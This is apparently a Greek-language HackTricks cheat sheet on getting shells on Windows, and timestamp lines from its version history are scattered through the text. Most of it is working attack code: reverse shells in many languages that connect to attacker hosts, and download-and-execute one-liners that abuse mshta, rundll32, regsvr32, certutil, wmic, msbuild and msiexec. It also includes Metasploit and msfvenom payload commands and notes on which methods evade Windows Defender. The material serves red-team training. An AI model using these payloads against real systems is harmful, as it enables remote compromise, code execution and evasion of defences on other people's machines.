2022-10-27 23:22:18 +00:00
# Shells - Windows
2022-04-28 16:01:33 +00:00
2024-07-18 20:11:44 +00:00
{% hint style="success" %}
2024-08-14 08:53:00 +00:00
Learn & practice AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Learn & practice GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-18 20:11:44 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-08-14 08:53:00 +00:00
< summary > Support HackTricks< / summary >
2023-12-30 20:49:23 +00:00
2024-08-14 08:53:00 +00:00
* Check the [**subscription plans** ](https://github.com/sponsors/carlospolop )!
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
2022-10-27 23:22:18 +00:00
< / details >
2024-07-18 20:11:44 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-03-15 00:12:21 +00:00
**Try Hard Security Group**
2024-07-18 20:11:44 +00:00
< figure > < img src = "/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt = "" > < figcaption > < / figcaption > < / figure >
2024-03-15 00:12:21 +00:00
{% embed url="https://discord.gg/tryhardsecurity" %}
***
2022-10-27 23:22:18 +00:00
## Lolbas
2022-04-28 16:01:33 +00:00
2024-08-14 08:53:00 +00:00
Η σελίδα [lolbas-project.github.io ](https://lolbas-project.github.io/ ) είναι γ ι α Windows όπως [https://gtfobins.github.io/ ](https://gtfobins.github.io/ ) είναι γ ι α linux.\
Προφανώς, **δεν υπάρχουν SUID αρχεία ή δικαιώματα sudo στα Windows** , αλλά είναι χρήσιμο ν α γνωρίζουμε **πώς** ορισμένα **binaries** μπορούν ν α (κατα)χρησιμοποιηθούν γ ι α ν α εκτελέσουν κάποιες απροσδόκητες ενέργειες όπως **η εκτέλεση αυθαίρετου κώδικα.**
2024-03-09 14:12:47 +00:00
## NC
2020-07-15 15:43:14 +00:00
```bash
nc.exe -e cmd.exe < Attacker_IP > < PORT >
```
2024-08-14 08:53:00 +00:00
## NCAT
θύμα
```
ncat.exe < Attacker_IP > < PORT > -e "cmd.exe /c (cmd.exe 2>& 1)"
#Encryption to bypass firewall
ncat.exe < Attacker_IP > < PORT eg . 443 > --ssl -e "cmd.exe /c (cmd.exe 2>& 1)"
```
επιτιθέμενος
```
ncat -l < PORT >
#Encryption to bypass firewall
ncat -l < PORT eg . 443 > --ssl
```
2022-10-27 23:22:18 +00:00
## SBD
2020-07-15 15:43:14 +00:00
2024-08-14 08:53:00 +00:00
**[sbd](https://www.kali.org/tools/sbd/) είναι μια φορητή και ασφαλής εναλλακτική του Netcat**. Λειτουργεί σε συστήματα τύπου Unix και Win32. Με δυνατότητες όπως ισχυρή κρυπτογράφηση, εκτέλεση προγραμμάτων, προσαρμόσιμες πηγές θυρών και συνεχόμενη επανασύνδεση, το sbd παρέχει μια ευέλικτη λύση γ ι α επικοινωνία TCP/IP. Για τους χρήστες Windows, η έκδοση sbd.exe από τη διανομή Kali Linux μπορεί ν α χρησιμοποιηθεί ως αξιόπιστη αντικατάσταση του Netcat.
2024-02-07 04:06:18 +00:00
```bash
# Victims machine
sbd -l -p 4444 -e bash -v -n
listening on port 4444
# Atackers
sbd 10.10.10.10 4444
id
uid=0(root) gid=0(root) groups=0(root)
```
2024-08-14 08:53:00 +00:00
## Python
2020-07-15 15:43:14 +00:00
```bash
#Windows
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__ (), __ctx.__exit__ (None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__ ': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__ ': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__ ('os', __g, __g))]][0] for __g['socket'] in [(__import__ ('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__ ('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__ ('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__ ('contextlib'))"
```
2022-10-27 23:22:18 +00:00
## Perl
2020-07-15 15:43:14 +00:00
```bash
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while< >;'
```
2024-08-14 08:53:00 +00:00
## Ρούμπι
2020-07-15 15:43:14 +00:00
```bash
#Windows
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```
2022-10-27 23:22:18 +00:00
## Lua
2020-07-15 15:43:14 +00:00
```bash
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```
2022-10-27 23:22:18 +00:00
## OpenSSH
2020-07-15 15:43:14 +00:00
2024-02-10 22:40:18 +00:00
Επιτιθέμενος (Kali)
2020-07-15 15:43:14 +00:00
```bash
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port < l_port > #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port < l_port2 > #Here yo will be able to get the response
```
2024-02-10 22:40:18 +00:00
Θύμα
2020-07-15 15:43:14 +00:00
```bash
#Linux
openssl s_client -quiet -connect < ATTACKER_IP > :< PORT1 > |/bin/bash|openssl s_client -quiet -connect < ATTACKER_IP > :< PORT2 >
#Windows
openssl.exe s_client -quiet -connect < ATTACKER_IP > :< PORT1 > |cmd.exe|openssl s_client -quiet -connect < ATTACKER_IP > :< PORT2 >
```
2022-10-27 23:22:18 +00:00
## Powershell
2020-07-15 15:43:14 +00:00
```bash
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
2021-03-18 23:05:52 +00:00
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
2020-07-15 15:43:14 +00:00
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile
```
2024-08-14 08:53:00 +00:00
Διαδικασία που εκτελεί κλήση δικτύου: **powershell.exe** \
Payload που γράφτηκε στον δίσκο: **Ο Χ Ι ** (_το υ λάχι σ το ν πουθενά δεν μπόρεσα ν α βρω χρησιμοποιώντας το procmon !_ )
2020-07-15 15:43:14 +00:00
```bash
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
```
2024-08-14 08:53:00 +00:00
Διαδικασία που εκτελεί κλήση δικτύου: **svchost.exe** \
Payload που έχει γραφτεί στον δίσκο: **WebDAV client local cache**
2024-03-09 14:12:47 +00:00
2024-08-14 08:53:00 +00:00
**Μία γραμμή:**
2020-07-15 15:43:14 +00:00
```bash
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>& 1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
2024-08-14 08:53:00 +00:00
**Πάρτε περισσότερες πληροφορίες σχετικά με διαφορετικά Powershell Shells στο τέλος αυτού του εγγράφου**
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
## Mshta
2020-07-15 15:43:14 +00:00
2024-02-10 22:40:18 +00:00
* [Από εδώ ](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ )
2020-07-15 15:43:14 +00:00
```bash
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
```
```bash
mshta http://webserver/payload.hta
```
```bash
mshta \\webdavserver\folder\payload.hta
```
2024-08-14 08:53:00 +00:00
#### **Παράδειγμα hta-psh αντίστροφης θήκης (χρησιμοποιήστε hta γ ι α ν α κατεβάσετε και ν α εκτελέσετε PS backdoor)**
2024-02-07 04:06:18 +00:00
```xml
2024-02-10 22:40:18 +00:00
< scRipt language = "VBscRipT" > CreateObject ( "WscrIpt.SheLL" ) . Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')" < / scRipt >
2020-07-15 15:43:14 +00:00
```
2024-08-14 08:53:00 +00:00
**Μπορείτε ν α κατεβάσετε και ν α εκτελέσετε πολύ εύκολα ένα Koadic zombie χρησιμοποιώντας το stager hta**
2020-07-15 15:43:14 +00:00
2024-08-14 08:53:00 +00:00
#### hta παράδειγμα
2024-02-05 02:28:59 +00:00
2024-02-10 22:40:18 +00:00
[**Από εδώ** ](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f )
2024-02-07 04:06:18 +00:00
```xml
2020-07-15 15:43:14 +00:00
< html >
< head >
< HTA:APPLICATION ID = "HelloExample" >
< script language = "jscript" >
2024-02-10 22:40:18 +00:00
var c = "cmd.exe /c calc.exe";
new ActiveXObject('WScript.Shell').Run(c);
2020-07-15 15:43:14 +00:00
< / script >
< / head >
< body >
< script > self . close ( ) ; < / script >
< / body >
< / html >
```
2022-10-27 23:22:18 +00:00
#### **mshta - sct**
2020-07-15 15:43:14 +00:00
2024-02-10 22:40:18 +00:00
[**Από εδώ** ](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17 )
2024-02-07 04:06:18 +00:00
```xml
2020-07-15 15:43:14 +00:00
<?XML version="1.0"?>
<!-- rundll32.exe javascript:" \.. \mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:C: \local \path \scriptlet.sct"")")) -->
< script let >
< public >
< / public >
< script language = "JScript" >
< ![CDATA[
2024-02-10 22:40:18 +00:00
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
2020-07-15 15:43:14 +00:00
]]>
< / script >
< / scriptlet >
```
2024-02-10 22:40:18 +00:00
#### **Mshta - Metasploit**
2020-07-15 15:43:14 +00:00
```bash
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit
```
```bash
Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit
```
2024-08-14 08:53:00 +00:00
**Ανιχνεύθηκε από τον αμυντικό μηχανισμό**
2024-02-07 04:06:18 +00:00
2024-07-18 20:11:44 +00:00
2022-10-27 23:22:18 +00:00
## **Rundll32**
2020-07-15 15:43:14 +00:00
2024-02-10 22:40:18 +00:00
[**Παράδειγμα Dll hello world** ](https://github.com/carterjones/hello-world-dll )
2024-02-07 04:06:18 +00:00
2024-02-10 22:40:18 +00:00
* [Από εδώ ](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ )
2020-07-15 15:43:14 +00:00
```bash
rundll32 \\webdavserver\folder\payload.dll,entrypoint
```
```bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
```
2024-08-14 08:53:00 +00:00
**Ανιχνεύθηκε από τον αμυντικό**
2020-07-15 15:43:14 +00:00
**Rundll32 - sct**
2024-02-10 22:40:18 +00:00
[**Από εδώ** ](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17 )
2024-02-07 04:06:18 +00:00
```xml
2020-07-15 15:43:14 +00:00
<?XML version="1.0"?>
<!-- rundll32.exe javascript:" \.. \mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
< script let >
< public >
< / public >
< script language = "JScript" >
< ![CDATA[
2024-02-10 22:40:18 +00:00
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
2020-07-15 15:43:14 +00:00
]]>
< / script >
< / scriptlet >
```
2022-10-27 23:22:18 +00:00
#### **Rundll32 - Metasploit**
2020-07-15 15:43:14 +00:00
```bash
use windows/smb/smb_delivery
run
#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0
```
**Rundll32 - Koadic**
```bash
use stager/js/rundll32_js
set SRVHOST 192.168.1.107
set ENDPOINT sales
run
#Koadic will tell you what you need to execute inside the victim, it will be something like:
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();
```
2022-10-27 23:22:18 +00:00
## Regsvr32
2020-07-15 15:43:14 +00:00
2024-02-10 22:40:18 +00:00
* [Από εδώ ](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ )
2020-07-15 15:43:14 +00:00
```bash
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
```
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
```
2024-08-14 08:53:00 +00:00
**Ανιχνεύθηκε από τον αμυντικό**
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
#### Regsvr32 -sct
2020-07-15 15:43:14 +00:00
2024-02-10 22:40:18 +00:00
[**Από εδώ** ](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1 )
2020-07-15 15:43:14 +00:00
```markup
<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
<!-- regsvr32 /u /n /s /i: \\webdavserver \folder \regsvr32.sct scrobj.dll -->
< script let >
2024-02-10 22:40:18 +00:00
< registration
progid="PoC"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
< script language = "JScript" >
< ![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
2020-07-15 15:43:14 +00:00
< / script >
< / registration >
< / scriptlet >
```
2024-02-10 22:40:18 +00:00
#### **Regsvr32 - Metasploit**
2020-07-15 15:43:14 +00:00
```bash
use multi/script/web_delivery
set target 3
set payload windows/meterpreter/reverse/tcp
set lhost 10.2.0.5
run
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
```
2024-08-14 08:53:00 +00:00
**Μπορείτε ν α κατεβάσετε και ν α εκτελέσετε πολύ εύκολα ένα Koadic zombie χρησιμοποιώντας το stager regsvr**
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
## Certutil
2020-07-15 15:43:14 +00:00
2024-02-10 22:40:18 +00:00
* [Από εδώ ](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ )
2020-07-15 15:43:14 +00:00
2024-02-10 22:40:18 +00:00
Κατεβάστε ένα B64dll, αποκωδικοποιήστε το και εκτελέστε το.
2020-07-15 15:43:14 +00:00
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
```
2024-02-10 22:40:18 +00:00
Κατεβάστε ένα B64exe, αποκωδικοποιήστε το και εκτελέστε το.
2020-07-15 15:43:14 +00:00
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
```
2024-08-14 08:53:00 +00:00
**Ανιχνεύθηκε από τον αμυντικό μηχανισμό**
2022-10-27 23:22:18 +00:00
2024-04-06 18:31:47 +00:00
2024-07-18 20:11:44 +00:00
## **Cscript/Wscript**
2020-07-15 15:43:14 +00:00
```bash
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""
```
**Cscript - Metasploit**
```bash
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs
```
2024-08-14 08:53:00 +00:00
**Ανιχνεύθηκε από τον αμυντικό**
2024-04-06 18:31:47 +00:00
2024-07-18 20:11:44 +00:00
## PS-Bat
2020-07-15 15:43:14 +00:00
```bash
\\webdavserver\folder\batchfile.bat
```
2024-08-14 08:53:00 +00:00
Διαδικασία που εκτελεί κλήση δικτύου: **svchost.exe** \
Φορτίο που γράφτηκε στον δίσκο: **WebDAV client local cache**
2020-07-15 15:43:14 +00:00
```bash
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
impacket-smbserver -smb2support kali `pwd`
```
```bash
\\10.8.0.3\kali\shell.bat
```
2024-08-14 08:53:00 +00:00
**Ανιχνεύθηκε από τον αμυντικό**
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
## **MSIExec**
2020-07-15 15:43:14 +00:00
2024-02-10 22:40:18 +00:00
Επιτιθέμενος
2022-10-27 23:22:18 +00:00
```
2020-11-11 00:39:24 +00:00
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
2020-07-15 15:43:14 +00:00
python -m SimpleHTTPServer 80
```
2024-02-10 22:40:18 +00:00
Θύμα:
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi
```
2024-08-14 08:53:00 +00:00
**Ανιχνεύθηκε**
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
## **Wmic**
2020-07-15 15:43:14 +00:00
2024-02-10 22:40:18 +00:00
* [Από εδώ ](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ )
2024-02-07 04:06:18 +00:00
```bash
2020-07-15 15:43:14 +00:00
wmic os get /format:"https://webserver/payload.xsl"
```
2024-07-18 20:11:44 +00:00
Παράδειγμα αρχείου xsl [από εδώ ](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7 ):
2024-02-07 04:06:18 +00:00
```xml
2020-07-15 15:43:14 +00:00
<?xml version='1.0'?>
< style sheet xmlns = "http://www.w3.org/1999/XSL/Transform" xmlns:ms = "urn:schemas-microsoft-com:xslt" xmlns:user = "placeholder" version = "1.0" >
< output method = "text" / >
2024-02-10 22:40:18 +00:00
< ms:script implements-prefix = "user" language = "JScript" >
< ![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");
]]>
< / ms:script >
2020-07-15 15:43:14 +00:00
< / stylesheet >
```
2024-08-14 08:53:00 +00:00
**Δεν ανιχνεύθηκε**
2020-07-15 15:43:14 +00:00
2024-08-14 08:53:00 +00:00
**Μπορείτε ν α κατεβάσετε και ν α εκτελέσετε πολύ εύκολα ένα Koadic zombie χρησιμοποιώντας το stager wmic**
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
## Msbuild
2020-07-15 15:43:14 +00:00
2024-02-10 22:40:18 +00:00
* [Από εδώ ](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ )
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
```
2024-08-14 08:53:00 +00:00
Μπορείτε ν α χρησιμοποιήσετε αυτή την τεχνική γ ι α ν α παρακάμψετε τους περιορισμούς της Λευκής Λίστας Εφαρμογών και του Powershell.exe. Θα σας ζητηθεί ν α ανοίξετε ένα PS shell.\
Απλώς κατεβάστε αυτό και εκτελέστε το: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj ](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj )
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
```
2024-08-14 08:53:00 +00:00
**Δεν ανιχνεύθηκε**
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
## **CSC**
2020-07-15 15:43:14 +00:00
2024-08-14 08:53:00 +00:00
Συμπληρώστε τον κώδικα C# στη μηχανή του θύματος.
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
```
2024-08-14 08:53:00 +00:00
Μπορείτε ν α κατεβάσετε μια βασική C# reverse shell από εδώ: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc ](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc )
2020-07-15 15:43:14 +00:00
2024-08-14 08:53:00 +00:00
**Όχι ανιχνεύσιμο**
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
## **Regasm/Regsvc**
2020-07-15 15:43:14 +00:00
2024-02-10 22:40:18 +00:00
* [Από εδώ ](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ )
2024-02-07 04:06:18 +00:00
```bash
2020-07-15 15:43:14 +00:00
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
```
2024-02-10 22:40:18 +00:00
**Δεν το έχω δοκιμάσει**
2020-07-15 15:43:14 +00:00
2020-12-24 11:57:24 +00:00
[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182** ](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182 )
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
## Odbcconf
2020-07-15 15:43:14 +00:00
2024-02-10 22:40:18 +00:00
* [Από εδώ ](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ )
2024-02-07 04:06:18 +00:00
```bash
2020-07-15 15:43:14 +00:00
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
```
2024-02-10 22:40:18 +00:00
**Δεν το έχω δοκιμάσει**
2020-07-15 15:43:14 +00:00
2020-12-24 11:57:24 +00:00
[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2** ](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2 )
2020-07-15 15:43:14 +00:00
2024-08-14 08:53:00 +00:00
## Powershell Shells
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
### PS-Nishang
2020-07-15 15:43:14 +00:00
[https://github.com/samratashok/nishang ](https://github.com/samratashok/nishang )
2024-08-14 08:53:00 +00:00
Στο φάκελο **Shells** , υπάρχουν πολλές διαφορετικές shells. Για ν α κατεβάσετε και ν α εκτελέσετε το Invoke-_PowerShellTcp.ps1_, κάντε ένα αντίγραφο του script και προσθέστε στο τέλος του αρχείου:
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444
```
2024-08-14 08:53:00 +00:00
Αρχίστε ν α εξυπηρετείτε το σενάριο σε έναν διακομιστή ιστού και εκτελέστε το στην πλευρά του θύματος:
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
```
2024-02-10 22:40:18 +00:00
Ο Defender δεν το ανιχνεύει ως κακόβουλο κώδικα (ακόμα, 3/04/2019).
2020-07-15 15:43:14 +00:00
2024-08-14 08:53:00 +00:00
**TODO: Έλεγχος άλλων nishang shells**
2020-07-15 15:43:14 +00:00
2022-10-27 23:22:18 +00:00
### **PS-Powercat**
2020-07-15 15:43:14 +00:00
2020-12-24 11:57:24 +00:00
[**https://github.com/besimorhino/powercat** ](https://github.com/besimorhino/powercat )
2020-07-15 15:43:14 +00:00
2024-08-14 08:53:00 +00:00
Κατεβάστε, ξεκινήστε έναν διακομιστή ιστού, ξεκινήστε τον ακροατή και εκτελέστε το στην πλευρά του θύματος:
2022-10-27 23:22:18 +00:00
```
2024-02-10 22:40:18 +00:00
powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
2020-07-15 15:43:14 +00:00
```
2024-08-14 08:53:00 +00:00
Defender δεν το ανιχνεύει ως κακόβουλο κώδικα (ακόμα, 3/04/2019).
2020-07-15 15:43:14 +00:00
2024-03-15 00:12:21 +00:00
**Άλλες επιλογές που προσφέρει το powercat:**
2024-07-18 20:11:44 +00:00
Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files...
2022-10-27 23:22:18 +00:00
```
2020-07-15 15:43:14 +00:00
Serve a cmd Shell:
2024-02-10 22:40:18 +00:00
powercat -l -p 443 -e cmd
2020-07-15 15:43:14 +00:00
Send a cmd Shell:
2024-02-10 22:40:18 +00:00
powercat -c 10.1.1.1 -p 443 -e cmd
2020-07-15 15:43:14 +00:00
Send a powershell:
2024-02-10 22:40:18 +00:00
powercat -c 10.1.1.1 -p 443 -ep
2020-07-15 15:43:14 +00:00
Send a powershell UDP:
2024-02-10 22:40:18 +00:00
powercat -c 10.1.1.1 -p 443 -ep -u
2020-07-15 15:43:14 +00:00
TCP Listener to TCP Client Relay:
2024-02-10 22:40:18 +00:00
powercat -l -p 8000 -r tcp:10.1.1.16:443
2020-07-15 15:43:14 +00:00
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
2024-02-10 22:40:18 +00:00
powercat -c 10.1.1.15 -p 443 -e cmd -g
2020-07-15 15:43:14 +00:00
Start A Persistent Server That Serves a File:
2024-02-10 22:40:18 +00:00
powercat -l -p 443 -i C:\inputfile -rep
2020-07-15 15:43:14 +00:00
```
2022-10-27 23:22:18 +00:00
### Empire
2020-07-15 15:43:14 +00:00
[https://github.com/EmpireProject/Empire ](https://github.com/EmpireProject/Empire )
2024-02-10 22:40:18 +00:00
